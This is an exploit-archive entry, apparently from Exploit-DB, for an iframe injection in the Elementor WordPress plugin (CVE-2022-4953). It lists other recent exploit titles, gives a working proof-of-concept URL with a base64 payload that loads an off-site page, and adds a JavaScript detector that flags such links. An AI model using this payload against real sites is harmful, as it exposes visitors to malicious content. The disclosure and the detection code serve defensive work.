
16 changes to exploits/shellcodes/ghdb Techview LA-5570 Wireless Gateway Home Automation Controller - Multiple Vulnerabilities Axigen < 10.3.3.47_ 10.2.3.12 - Reflected XSS Drupal 10.1.2 - web-cache-poisoning-External-service-interaction Jorani v1.0.3-(c)2014-2023 - XSS Reflected & Information Disclosure soosyze 2.0.0 - File Upload SPA-Cart eCommerce CMS 1.9.0.3 - SQL Injection Wordpress Plugin Elementor 3.5.5 - Iframe Injection Wp2Fac - OS Command Injection Maltrail v0.53 - Unauthenticated Remote Code Execution (RCE) SyncBreeze 15.2.24 - 'login' Denial of Service GOM Player 2.3.90.5360 - Buffer Overflow (PoC) GOM Player 2.3.90.5360 - Remote Code Execution (RCE) Windows/x64 - PIC Null-Free TCP Reverse Shell Shellcode (476 Bytes)
15 lines
No EOL
621 B
Text
# Exploit Title: Wordpress Plugin Elementor < 3.5.5 - Iframe Injection
# Date: 28.08.2023
# Exploit Author: Miguel Santareno
# Vendor Homepage: https://elementor.com/
# Version: < 3.5.5
# Tested on: Google and Firefox latest version
# CVE : CVE-2022-4953

# 1. Description
The plugin does not filter out user-controlled URLs from being loaded into the DOM. This could be used to inject rogue iframes that point to malicious URLs.


# 2. Proof of Concept (PoC)
Proof of Concept:
https://vulnerable-site.tld/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwczovL2Rvd25sb2FkbW9yZXJhbS5jb20vIn0K
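
The action travels in the URL fragment, which browsers never send to the server, so it has to be checked where the full link is visible (mail or chat link scanning, browser-side tooling). The following is an added example for that kind of triage, not code from the advisory or from Elementor: it decodes the base64 JSON in `settings` and flags a lightbox URL that leaves the site. The names `inspectElementorAction` and `parseActionParams` and the allowlisted hosts are assumptions.

```javascript
// Added example, not Elementor or exploit-author code; allowlist hosts are assumed policy.
const ALLOWED_EMBED_HOSTS = new Set(['www.youtube.com', 'player.vimeo.com']);
// The PoC link from the page, used as sample input.
const PAGE_POC = 'https://vulnerable-site.tld/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwczovL2Rvd25sb2FkbW9yZXJhbS5jb20vIn0K';

// Split "k=v&k=v" by hand: URLSearchParams would turn a '+' in the base64 into a space.
function parseActionParams(text) {
  const out = Object.create(null);
  for (const pair of text.split('&')) {
    const i = pair.indexOf('=');
    if (i > 0) out[pair.slice(0, i)] = pair.slice(i + 1);
  }
  return out;
}

function inspectElementorAction(link, siteHost) {
  let frag;
  try { frag = new URL(link).hash.slice(1); } catch { return { flagged: false, reason: 'not a URL' }; }
  // The fragment may arrive percent-encoded; fall back to the raw text if decoding fails.
  try { frag = decodeURIComponent(frag); } catch { /* keep the raw fragment */ }
  const prefix = 'elementor-action:';
  if (!frag.startsWith(prefix)) return { flagged: false, reason: 'no elementor-action fragment' };

  const { action, settings: b64 = '' } = parseActionParams(frag.slice(prefix.length));
  let settings;
  try {
    settings = JSON.parse(Buffer.from(b64, 'base64').toString('utf8'));
  } catch {
    return { action, flagged: true, reason: 'settings are not base64-encoded JSON' };
  }
  if (!settings || typeof settings.url !== 'string') {
    return { action, flagged: false, reason: 'no url in settings' };
  }
  let target;
  try { target = new URL(settings.url, `https://${siteHost}/`); } catch {
    return { action, type: settings.type, flagged: true, reason: 'unparseable url' };
  }
  // Only http(s) URLs on the site itself or on an allowlisted embed host pass.
  const okScheme = target.protocol === 'https:' || target.protocol === 'http:';
  const okHost = target.hostname === siteHost || ALLOWED_EMBED_HOSTS.has(target.hostname);
  return {
    action, type: settings.type, host: target.hostname,
    flagged: !(okScheme && okHost),
    reason: okScheme ? (okHost ? 'allowed host' : 'off-site host') : 'non-http scheme',
  };
}
```

Run under Node.js, `inspectElementorAction(PAGE_POC, 'vulnerable-site.tld')` reports the lightbox action as flagged with reason `off-site host`.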